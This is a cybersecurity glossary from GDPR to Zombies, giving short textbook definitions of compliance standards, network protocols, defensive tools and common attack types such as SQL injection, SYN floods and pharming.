General Data Protection Regulation (GDPR) - A regulation in EU law on data protection and privacy for all individual citizens of the European Union and European Economic Area. Also addresses the export of personal data outside the EU and EEA areas.
Governance Risk and Compliance (GRC) - A set of processes and procedures to help organizations achieve business objectives, address uncertainty, and act with integrity. The basic purpose of GRC is to instill good business practices into everyday life.
Health Insurance Portability and Accountability Act (HIPAA) 1996 - Requires entities that process protected health information to comply with security and privacy requirements.
Highly Evasive Adaptive Threats (HEAT) - A class of cyberthreats that employ techniques designed to bypass legacy detection stacks. Some techniques include dynamic file downloads, HTML smuggling, and delivering password-protected archives to get content past filters, so that the malicious payload reaches the endpoint without user interaction. Other techniques include evading web categorization engines by compromising benign, poorly protected websites, which are then used to serve malicious content.
Honey Pot - Programs that simulate one or more network services that you designate on your computer's ports. An attacker assumes you're running vulnerable services that can be used to break into the machine. A honey pot can be used to log access attempts to those ports including the attacker's keystrokes. This could give you advanced warning of a more concerted attack.
Host-Based Intrusion Detection System (H-IDS) - A program that monitors the characteristics of a single host and the events occurring within that host to identify suspicious activity.
Host-Based Intrusion Prevention System (H-IPS) - A program that monitors the characteristics of a single host and the events occurring within that host to identify suspicious activity such as attacks, and takes action against them.
Hybrid Attack - A Hybrid Attack builds on the dictionary attack method by adding numerals and symbols to dictionary words.
Hybrid Encryption - An application of cryptography that combines two or more encryption algorithms, particularly a combination of symmetric and asymmetric encryption.
Identity-Aware Proxy (IAP) - A Google Cloud Platform service that centralizes user access to SaaS applications and other cloud resources accessed by HTTPS. IAP secures authentication for requests made to virtual machines running on GCP and other cloud-based and on-premises applications, only granting access to users you authorize. With IAP, users can connect from untrusted networks without using a VPN.
Identity as a Service (IDaaS) - A cloud-based authentication built and operated by a third-party provider. IDaaS companies supply cloud-based authentication or identity management to enterprises who subscribe.
Identity Provider (IdP) - A service that stores and manages digital identities. Companies use these services to allow their employees or users to connect with the resources they need. They provide a way to manage access, adding or removing privileges, while security remains tight.
Incident Handling - Incident Handling is an action plan for dealing with intrusions, cyber-theft, denial of service, fire, floods, and other security-related events. It is comprised of a six step process: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.
Incident Response Plan - The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit the consequences of malicious cyber attacks against an organization's information system(s).
Indicators of Attack (IOA) - Indicators of attack (IOA) focus on detecting the intent of what an attacker is trying to accomplish, regardless of the malware or exploit used in an attack.
Indicator of Compromise (IOC) - An Indicator of Compromise (IOC) is often described in the forensics world as evidence on a computer that indicates that the security of the network has been breached. Investigators usually gather this data after being informed of a suspicious incident, on a scheduled basis, or after the discovery of unusual call-outs from the network. Ideally, this information is gathered to create “smarter” tools that can detect and quarantine suspicious files in the future.
Information Security Management System (ISMS) - An Information Security Management System describes and demonstrates your organisation’s approach to information security and privacy. It will help you identify and address the threats and opportunities around your valuable information and any related assets. That protects your organisation from security breaches and shields it from disruption if and when they do happen.
Initial Access Brokers (IABs) - Initial access brokers are malicious actors that provide access to secure networks for a fee. They are often hackers but may also gain access to networks using social engineering. Their motivation is not to carry out cyberattacks themselves but rather to sell the access to another party.
Internet Control Message Protocol (ICMP) - An Internet Standard protocol that is used to report error conditions during IP datagram processing and to exchange other information concerning the state of the IP network.
Internet Message Access Protocol (IMAP) - A protocol that defines how a client should fetch mail from and return mail to a mail server. IMAP is intended as a replacement for or extension to the Post Office Protocol (POP).
Intrusion Detection System (IDS) - A security management system for computers and networks. An IDS gathers and analyzes information from various areas within a computer or a network to identify possible security breaches, which include both intrusions (attacks from outside the organization) and misuse (attacks from within the organization).
Intrusion Prevention System (IPS) - Software that has all the capabilities of an intrusion detection system and can also attempt to stop possible incidents.
IP Flood - A denial of service attack that sends a host more echo request ("ping") packets than the protocol implementation can handle.
Just-In-Time (JIT) provisioning - Enables automatic user account creation in an IdP the first time a user authenticates with a directory server delegated authentication or Desktop SSO.
Kerberos - A system developed at the Massachusetts Institute of Technology that depends on passwords and symmetric cryptography to implement a ticket-based, peer entity authentication service and access control service distributed in a client-server network environment. Early versions used DES; DES in Kerberos was deprecated by RFC 6649, and modern deployments use AES-based encryption types.
Key Distribution Center (KDC) - A way to automatically distribute keys to support arbitrary connections between pairs of users. The users can be a computer, a process or applications. Each user shares a unique key with the KDC, known as the master key.
Layer 2 Tunneling Protocol (L2TP) - An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
Least Privilege - Least Privilege is the principle of allowing users or applications the least amount of permissions necessary to perform their intended function.
Lightweight Directory Access Protocol (LDAP) - A software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate Intranet.
Mandatory Access Control (MAC) - A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity.
Man-In-The-Middle Attack (MitM) - A form of active wiretapping attack in which the attacker intercepts and selectively modifies communicated data to masquerade as one or more of the entities involved in a communication association.
Message Authentication Code (MAC) - A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data.
Message Digest 5 (MD5) - A one-way cryptographic hash function. Also see "hash functions" and "SHA1".
Multi-factor Authentication (MFA) / Two-factor Authentication (2FA) - An authentication system that requires more than one distinct authentication factor for successful authentication. Multifactor authentication can be performed using a multifactor authenticator or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.
Need-To-Know - Decision made by an authorized holder of official information that a prospective recipient requires access to specific official information to carry out official duties.
Network Address Translation (NAT) - The process of mapping addresses on one network to addresses on another network.
National Institute of Standards and Technology (NIST) - National Institute of Standards and Technology, a unit of the US Commerce Department. Formerly known as the National Bureau of Standards, NIST promotes and maintains measurement standards. It also has active programs for encouraging and assisting industry and science to develop and use these standards.
Network Interface Card (NIC) - A circuit board or card that is installed in a computer so that it can be connected to a network.
Network-Based IDS - A network-based IDS monitors the traffic on its network segment as a data source. This is generally accomplished by placing the network interface card in promiscuous mode to capture all network traffic that crosses its network segment. Network traffic on other segments, and traffic on other means of communication (like phone lines), can't be monitored. Network-based IDS involves looking at the packets on the network as they pass by some sensor. The sensor can only see the packets that happen to be carried on the network segment it's attached to. Packets are considered to be of interest if they match a signature. Network-based intrusion detection passively monitors network activity for indications of attacks. Network monitoring offers several advantages over traditional host-based intrusion detection systems. Because many intrusions occur over networks at some point, and because networks are increasingly becoming the targets of attack, these techniques are an excellent method of detecting many attacks which may be missed by host-based intrusion detection mechanisms.
Non-Repudiation - Non-repudiation is the ability for a system to prove that a specific user and only that specific user sent a message and that it hasn't been modified.
One-Way Encryption - Irreversible transformation of plaintext to cipher text, such that the plaintext cannot be recovered from the cipher text by other than exhaustive procedures even if the cryptographic key is known.
One-Way Function - A (mathematical) function, f, whose output is easy to compute for a given input. However, given only the output value, it is impossible (except by a brute-force attack) to figure out what the input value was.
Open Shortest Path First (OSPF) - Open Shortest Path First is a link state routing algorithm used in interior gateway routing. Routers maintain a database of all routers in the autonomous system with links between the routers, link costs, and link states (up and down).
Open Authorization (OAuth) - Protocol standard that enables applications (consumers) to access protected resources from web services (service providers) via an API without requiring users to disclose their service provider credentials to those consumers.
Open Vulnerability and Assessment Language (OVAL) - A language for representing system configuration information, assessing machine state, and reporting assessment results.
Operating System (OS) Fingerprinting - Analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target.
Open Web Application Security Project (OWASP) - A nonprofit foundation that works to improve the security of software. Notable projects include the OWASP Top 10, a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
Password Authentication Protocol (PAP) - Password Authentication Protocol is a simple, weak authentication mechanism where a user enters the password and it is then sent across the network, usually in the clear.
Password Cracking - Password cracking is the process of attempting to guess passwords, given the password file information.
Password Sniffing - Passive wiretapping, usually on a local area network, to gain knowledge of passwords.
Payload - Payload is the actual application data a packet contains.
Payment Card Industry Data Security Standard (PCI DSS) - An information security standard administered by the Payment Card Industry Security Standards Council that is for organizations that handle branded credit cards from the major card schemes.
Personally Identifiable Information (PII) - Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual's identity, such as name, social security number, date and place of birth, mother's maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.
Ping of Death - An attack that sends an improperly large ICMP echo request packet (a "ping") with the intent of overflowing the input buffers of the destination machine and causing it to crash.
Ping Sweep - An attack that sends ICMP echo requests ("pings") to a range of IP addresses, with the goal of finding hosts that can be probed for vulnerabilities.
Pharming - This is a more sophisticated form of MITM attack. A user's session is redirected to a masquerading website. This can be achieved by corrupting a DNS server on the Internet and pointing a URL to the masquerading website's IP. Almost all users use a URL like www.worldbank.com instead of the real IP (192.86.99.140) of the website. By changing the pointers on a DNS server, the URL can be redirected to send traffic to the IP of the pseudo website. At the pseudo website, transactions can be mimicked and information like login credentials can be gathered. With this the attacker can access the real www.worldbank.com site and conduct transactions using the credentials of a valid user on that website.
Point-to-Point Tunneling Protocol (PPTP) - A protocol (set of communication rules) that allows corporations to extend their own corporate network through private "tunnels" over the public Internet.
Port Address Translation (PAT) - An extension of Network Address Translation (NAT) that permits multiple devices on a LAN to be mapped to a single public IP address to conserve IP addresses.
Pretty Good Privacy (PGP) - Trademark of Network Associates, Inc., referring to a computer program (and related protocols) that uses cryptography to provide data security for electronic mail and other applications on the Internet.
Protected Health Information (PHI) - Any information about health status, provision of health care, or payment for health care that is created or collected by a Covered Entity (or a Business Associate of a Covered Entity), and can be linked to a specific individual.
Provenance - Documenting the inputs, entities, systems, and processes that influence the data of interest, in effect providing a historical record of data and its origins.
Proxy Server - A server that acts as an intermediary between a workstation user and the Internet so that the enterprise can ensure security, administrative control, and caching service. A proxy server is associated with or part of a gateway server that separates the enterprise network from the outside network and a firewall server that protects the enterprise network from outside intrusion.
Public Key Infrastructure (PKI) - The architecture, organization, techniques, practices, and procedures that collectively support the implementation and operation of a certificate-based public key cryptographic system. Framework established to issue, maintain, and revoke public key certificates.
Public-Key Forward Secrecy (PFS) - For a key agreement protocol based on asymmetric cryptography, the property that ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Qualitative Assessment - Use of a set of methods, principles, or rules for assessing risk based on nonnumerical categories or levels.
Qualitative Risk Analysis - A method for risk analysis that is based on the assignment of a descriptor such as low, medium, or high.
Quantitative Assessment - Use of a set of methods, principles, or rules for assessing risks based on the use of numbers where the meanings and proportionality of values are maintained inside and outside the context of the assessment.
Quantitative Risk Analysis - A method for risk analysis where numerical values are assigned to both impact and likelihood based on statistical probabilities and monetarized valuation of loss or gain.
Ransomware - A type of malware that is a form of extortion. It works by encrypting a victim's hard drive, denying them access to key files. The victim must then pay a ransom to decrypt the files and gain access to them again.
Ransomware as a service (RaaS) - A subscription-based model that enables affiliates to use already-developed ransomware tools to execute ransomware attacks. Affiliates earn a percentage of each successful ransom payment.
Reconnaissance - Reconnaissance is the phase of an attack where an attacker finds new systems, maps out networks, and probes for specific, exploitable vulnerabilities.
Reverse Proxy - A reverse proxy accepts public HTTP requests and passes them to back-end web servers, which return the content to the proxy; the proxy then sends that content to the end user.
Risk Assessment - The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management; it incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.
Risk Averse - Avoiding risk even if this leads to the loss of opportunity. For example, using a (more expensive) phone call vs. sending an e-mail in order to avoid risks associated with e-mail may be considered "Risk Averse".
Rivest-Shamir-Adleman (RSA) - An algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman.
Role Based Access Control (RBAC) - Role based access control assigns users to roles based on their organizational functions and determines authorization based on those roles.
Rootkit - A collection of tools (programs) that a hacker uses to mask intrusion and obtain administrator-level access to a computer or computer network.
Routing Information Protocol (RIP) - Routing Information Protocol is a distance vector protocol used for interior gateway routing which uses hop count as the sole metric of a path's cost.
Remote Access Server (RAS) - Devices, such as virtual private network gateways and modem servers, that facilitate connections between networks.
Replay Attack - An attack in which the Attacker is able to replay previously captured messages (between a legitimate Claimant and a Verifier) to masquerade as that Claimant to the Verifier or vice versa.
Representational State Transfer (REST) - A software architectural style that defines a common method for defining APIs for Web services.
Residual Risk - Portion of risk remaining after security measures have been applied.
Risk Register - A central record of current risks, and related information, for a given scope or organization. Current risks comprise both accepted risks and risks that have a planned mitigation path (i.e., risks to be eliminated, as annotated in a POA&M). See OMB Circular A-11 for detailed information about risk register contents for Federal entities.
Secure/Multipurpose Internet Mail Extensions (S/MIME) - A widely accepted protocol for sending digitally signed and encrypted messages.
Security Assertion Markup Language (SAML) - An XML-based standard for exchanging authentication and authorization data between security domains, that is, between an identity provider (a producer of assertions) and service providers (consumers of assertions).
Security Incident and Event Management (SIEM) - A tool used on an organization's data network to centralize the storage and interpretation of logs, or events, generated by other software running on the network.
S/Key - A security mechanism that uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. The client generates a one-time password by applying the MD4 cryptographic hash function multiple times to the user's secret key. For each successive authentication of the user, the number of hash applications is reduced by one.
Sender Policy Framework (SPF) - An email authentication protocol and part of email cybersecurity used to stop phishing attacks. It allows your company to specify who is allowed to send email on behalf of your domain. This is useful because in a typical phishing attack, the threat actor spoofs the sender address to look like an official business account or someone the victim may know.
Session Key - In the context of symmetric encryption, a key that is temporary or is used for a relatively short period of time. Usually, a session key is used for a defined period of communication between two computers, such as for the duration of a single connection or transaction set, or the key is used in an application that protects relatively large amounts of data and, therefore, needs to be re-keyed frequently.
Secure Hash Algorithm (SHA1) - A one-way cryptographic hash function. It is slower than MD5 but more secure.
Security Information and Event Management (SIEM) - A security management tool that collects and stores event and log data, and correlates that data together to find threats. They are also used for compliance and reporting for companies which must adhere to compliance regulations like GDPR, PCI-DSS, and others.
Simple Object Access Protocol (SOAP) - An XML-based protocol for exchanging structured information in a decentralized, distributed environment.
Security Operations, Analytics and Reporting (SOAR) - Also known as Security Orchestration, Automation and Response, or Security Orchestration and Automation Platform (SOAP); the use of automation to help reduce response times, improve consistency, and amplify the productivity of incident response teams.
Simple Network Management Protocol (SNMP) - The protocol governing network management and the monitoring of network devices and their functions. A set of protocols for managing complex networks.
Single Loss Expectancy (SLE) - Tells us what kind of monetary loss we can expect if an asset is compromised because of a risk. Calculating SLE requires knowledge of the asset value (AV) and the range of loss that can be expected if a risk is exploited, which is known as the exposure factor (EF). EF is a percentage determined by how much of an impact we can expect based on the risk, the highest being 1 (signifying 100%). In formulaic terms, SLE = AV ∗ EF.
Smurf Attack - The Smurf attack works by spoofing the target address and sending a ping to the broadcast address for a remote network, which results in a large amount of ping replies being sent to the target.
Social Engineering - An attempt to trick someone into revealing information (e.g., a password) that can be used to attack systems or networks.
SOCKS - A protocol that a proxy server can use to accept requests from client users in a company's network so that it can forward them across the Internet. SOCKS uses sockets to represent and keep track of individual connections. The client side of SOCKS is built into certain Web browsers and the server side can be added to a proxy server.
Split Key - A cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key that results from combining the items.
SQL Injection - SQL injection is a type of input validation attack specific to database-driven applications where SQL code is inserted into application queries to manipulate the database.
Stack Smashing - Stack smashing is the technique of using a buffer overflow to trick a computer into executing arbitrary code.
Stream Cipher - A stream cipher works by encrypting a message a single bit, byte, or computer word at a time.
Symmetric Cryptography - A branch of cryptography involving algorithms that use the same key for two different steps of the algorithm (such as encryption and decryption, or signature creation and signature verification). Symmetric cryptography is sometimes called "secret-key cryptography" (versus public-key cryptography) because the entities that share the key.
SYN Flood - A denial of service attack that sends a host more TCP SYN packets (request to synchronize sequence numbers, used when opening a connection) than the protocol implementation can handle.
Tactics, Techniques, and Procedures (TTPs) - The behavior of an actor. A tactic is the highest-level description of this behavior, while techniques give a more detailed description of behavior in the context of a tactic, and procedures an even lower-level, highly detailed description in the context of a technique.
Threat Assessment/Analysis - Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.
Threat Modeling - A form of risk assessment that models aspects of the attack and defense sides of a logical entity, such as a piece of data, an application, a host, a system, or an environment.
Threat Vector - The method a threat uses to get to the target.
Tiny Fragment Attack - With many IP implementations it is possible to impose an unusually small fragment size on outgoing packets. If the fragment size is made small enough to force some of a TCP packet's TCP header fields into the second fragment, filter rules that specify patterns for those fields will not match. If the filtering implementation does not enforce a minimum fragment size, a disallowed packet might be passed because it didn't hit a match in the filter. STD 5, RFC 791 states: Every Internet module must be able to forward a datagram of 68 octets without further fragmentation. This is because an Internet header may be up to 60 octets, and the minimum fragment is 8 octets.
Triple DES (3DES) - A block cipher, based on DES, that transforms each 64-bit plaintext block by applying the Data Encryption Algorithm three successive times, using either two or three different keys, for an effective key length of 112 or 168 bits.
Trojan Horse - A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.
Trusted Ports - Trusted ports are ports below number 1024 usually allowed to be opened by the root user.
User Behavior Analytics (UBA) - User behavior analytics, sometimes called user entity behavior analytics (UEBA), is a category of software that helps security teams identify and respond to insider threats that might otherwise be overlooked. Using machine learning and analytics, UBA identifies and follows the behaviors of threat actors as they traverse enterprise environments, running data through a series of algorithms to detect actions that deviate from user norms.
Zero Day - The day a new vulnerability is made known. In some cases, a "zero day" exploit refers to an exploit for which no patch is available yet.
Zero-day attack - A zero-day attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer. Zero-day exploits (actual code that can use a security hole to carry out an attack) are used or shared by attackers before the software developer knows about the vulnerability.
Zero Trust - A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.
Zombies - A zombie computer (often shortened as zombie) is a computer connected to the Internet that has been compromised by a hacker, a computer virus, or a trojan horse. Generally, a compromised machine is only one of many in a botnet, and will be used to perform malicious tasks of one sort or another under remote direction. Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies.